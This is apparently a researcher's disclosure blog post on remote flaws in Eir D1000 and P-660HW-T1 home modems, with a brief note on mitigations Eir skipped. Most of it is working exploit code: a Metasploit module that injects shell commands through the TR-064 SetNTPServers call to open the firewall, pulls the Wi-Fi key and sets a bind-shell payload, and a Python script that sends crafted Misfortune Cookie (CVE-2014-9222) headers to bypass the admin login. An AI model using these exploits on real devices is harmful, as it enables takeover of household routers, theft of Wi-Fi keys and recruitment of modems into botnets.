Featured

Eir’s D1000 Modem Is Wide Open To Being Hacked.

Background

The Eir D1000 Modem has bugs that allow an attacker to gain full control of the modem from the Internet. The modem could then be used to hack into internal computers on the network, as a proxy host to hack other
computers or even as a bot in a botnet.

A port scan of the the modem revealed that it has one TCP port exposed to the Internet, port 7547. Port 7547 is running as part of the TR-069 protocol. TR-069 a.k.a CPE WAN Management Protocol a.k.a. CWMP is a protocol that ISPs like Eir use to manage all of the modems on their network.

When Eir’s technical support want to manage the modem – maybe to reset the Wi-Fi password, they instruct the ACS (Access Control Server – the server used to manage the modems) to connect to the modem on port 7547 and send it a “connection request” command. The modem then connects to the ACS and Eir’s technical support can change whatever settings they want.

What is not very well known is that the server on port 7457 is also a TR-064 server.
This is another protocol related to TR-069. It is also known as “LAN-Side CPE Configuration”. The idea behind this protocol is to allow the ISP to configure the modem from installation software supplied with the modem. The protocol is not supposed to be accessed from the WAN side of the modem but in the D1000 modem, we can send TR-064 commands to port 7547 on the WAN side. This allows us to “configure” the modem from the Internet.

There are many TR-064 commands, some useful ones are:

DeviceInfo/GetInfo:
 This gives general information about the modem including serial number, 
 firmware version, device description etc...

WLANConfiguration/GetSecurityKeys:
 This returns the Wi-Fi key

WLANConfiguration/GetInfo:
 This returns the SSID and MAC address

Time/SetNTPServers:
 This is the pièce de résistance. We can exploit this command to run
 busybox shell commands on the modem. e.g. setting the NTP server to
 "`iptables -F INPUT`" turns off the firewall on the modem which in 
 turn allows access to the administration interface on port 80.

Proof Of Concept Exploit

By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall. This allows access the the web administration interface from the Internet facing side of the modem. The default login password for the D1000 is the Wi-Fi password. This is easily obtained with another TR-064 command.

Here’s a Metasploit module :


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Eir D1000 Modem CWMP Exploit POC',
      'Description' => %q{
        This exploit drops the firewall to allow access to the web administration interface on port 80 and
	it also retrieves the wifi password. The default login password to the web interface is the default wifi
        password. This exploit was tested on firmware versions up to 2.00(AADU.5)_20150909.
      },
      'Author'      =>
        [
          'Kenzo', # Vulnerability discovery and Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'DisclosureDate' => 'Nov 07 2016',
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'linux/mipsbe/shell_bind_tcp'
        },
      'Targets' =>
        [
          [ 'MIPS Little Endian',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPSLE
            }
          ],
          [ 'MIPS Big Endian',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPSBE
            }
          ],
        ],
      'DefaultTarget'    => 1
      ))

    register_options(
      [
        Opt::RPORT(7547), # CWMP port
      ], self.class)

  @data_cmd_template = "<?xml version=\"1.0\"?>"
  @data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
  @data_cmd_template << " <SOAP-ENV:Body>"
  @data_cmd_template << "  <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
  @data_cmd_template << "   <NewNTPServer1>%s</NewNTPServer1>"
  @data_cmd_template << "   <NewNTPServer2></NewNTPServer2>"
  @data_cmd_template << "   <NewNTPServer3></NewNTPServer3>"
  @data_cmd_template << "   <NewNTPServer4></NewNTPServer4>"
  @data_cmd_template << "   <NewNTPServer5></NewNTPServer5>"
  @data_cmd_template << "  </u:SetNTPServers>"
  @data_cmd_template << " </SOAP-ENV:Body>"
  @data_cmd_template << "</SOAP-ENV:Envelope>"
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => '/globe'
      })
    rescue ::Rex::ConnectionError
      vprint_error("A connection error has occured")
      return Exploit::CheckCode::Unknown
    end

    if res and res.code == 404 and res.body =~ /home_wan.htm/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Trying to access the device...")

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
    end

    print_status("Exploiting...")
    print_status("Dropping firewall on port 80...")
    execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","")
    key = get_wifi_key()
    print_status("WiFi key is #{key}")
    execute_command("tick.eircom.net","")
  end

  def execute_command(cmd, opts)
    uri = '/UD/act?1'
    soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
    data_cmd = @data_cmd_template % "#{cmd}"
    begin
      res = send_request_cgi({
        'uri'    => uri,
        'ctype' => "text/xml",
        'method' => 'POST',
        'headers' => {
          'SOAPAction' => soapaction,
          },
        'data' => data_cmd
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end

  def get_wifi_key()
    print_status("Getting the wifi key...")
    uri = '/UD/act?1'
    soapaction = "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"
    data_cmd_template = "<?xml version=\"1.0\"?>"
    data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
    data_cmd_template << " <SOAP-ENV:Body>"
    data_cmd_template << "  <u:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\">"
    data_cmd_template << "  </u:GetSecurityKeys>"
    data_cmd_template << " </SOAP-ENV:Body>"
    data_cmd_template << "</SOAP-ENV:Envelope>"
    data_cmd= data_cmd_template

    begin
      res = send_request_cgi({
        'uri'    => uri,
        'ctype' => "text/xml",
        'method' => 'POST',
        'headers' => {
          'SOAPAction' => soapaction,
          },
        'data' => data_cmd
      })

      /NewPreSharedKey>(?<key>.*)<\/NewPreSharedKey/ =~ res.body
      return key
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end

Precautions Eir Could Have Taken To Make The Modem More Secure

  1. Back in the days when Eir were Eircom and they used Netopia modems, port 7547 was blocked to every IP address except those assigned to Eir’s management servers. This meant even though the Netopia modems had bugs, they could not be exploited. Inexplicably, Eir do not do this for their newer modems. If they did, these bugs would not have been exploitable.
  2. They could have started a bug bounty program. This would have created an incentive for security researchers to look for flaws in Eir’s modems.

Other Points Of Interest

  • This is not the only bug in this software, there are others. It was not even the first, previous firmware versions were also vulnerable to CVE-2014-9222, the “Misfortune Cookie” bug. Eir quietly patched that bug in firmware version “2.00(AADU.5)D0.”, sometime in early 2015.
  • There are also a few thousand Eir modems being used on other ISP networks (mainly Vodafone). These are no longer being managed by Eir therefore any firmware updates will not be applied to these and it is likely that they will remain vulnerable to this exploit even if Eir update the firmware to fix these bugs.
  • Another of Eir’s modems, the “P-660HN-T1A_IPv6” is vulnerable to the same bugs.
  • Currently Shodan.io, the “Internet of Things” search engine shows that they are about 66,000 modems affected by this bug. Previously, it showed it to be around 100,000. Click here to search Shodan.io (you need to have an account there)

Further Reading

https://www.broadband-forum.org/technical/download/TR-064.pdf
https://www.broadband-forum.org/technical/download/TR-069.pdf

Eir P-660HW-T1 Vulnerability

cw16kd6xaaaeqpx

Yet another Eir modem is hackable remotely, the P-660HW-T1. This is one
of the older models Eir use. It hasn’t had a firmware update since 2010.

This modem is based on ZynOS unlike the D1000, which was based on Linux. This makes it useless for DDOS worms based on Linux but this exploit could still be used to hack internal hosts on the networks by changing the DNS server.

The exploit uses the TR-069 port to communicate with the modem.
The P-660HW-T1 uses a non-standard port for TR-069, port 8088. This port is not scanned by Shodan.io so I am unable to give an estimate of how many modems are affected.

The exploit uses CVE-2014-9222, more commonly known as the “Misfortune Cookie” vulnerability. CVE-2014-922 allows memory to be overwritten using specially crafted cookies.

After running the exploit, the web management interface can be accessed on port 8088. Any password can be used to log in.

These brings the total number of Eir modems with serious bugs to three.

  1. D1000
  2. P-660HN-T1A_IPv6
  3. P-660HW-T1

Proof of Concept Code:

#!/usr/bin/env python
#==========================================================
# Eircom "P-660HW-T1 v3" (rebranded ZyXEL) WAN-side Exploit
# Tested on firmware version V3.70(BOE.4)D0 | 08/23/2010
#
# This exploit uses CVE-2014-9222 to gain access to the
# web interface from port 8088. Any password can be used
# to log in.
#
# Author: kenzo (at) tuta (dot) io
#==========================================================
import sys
import requests

PORT="8088"

class exploit:

    def run(self, router_ip):
        #Bypass the CWMP port check. Bypass the password check
        headers = {"Cookie": "C88605=AAAAAAAA;C107257012=\x08\x0b\x27\x19\x66\x40\xb0\x21;C107257012=\x08\x0b\x27\x19"}  

        req = requests.get("http://" + router_ip +":" + PORT + "/",  headers = headers)
        if (req.status_code == 200):
            print("The exploit was sent successfully. Try accessing the management interface on port " + PORT)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Please supply an ip address")
        exit()

    router_ip = sys.argv[1]
    exploit().run(router_ip)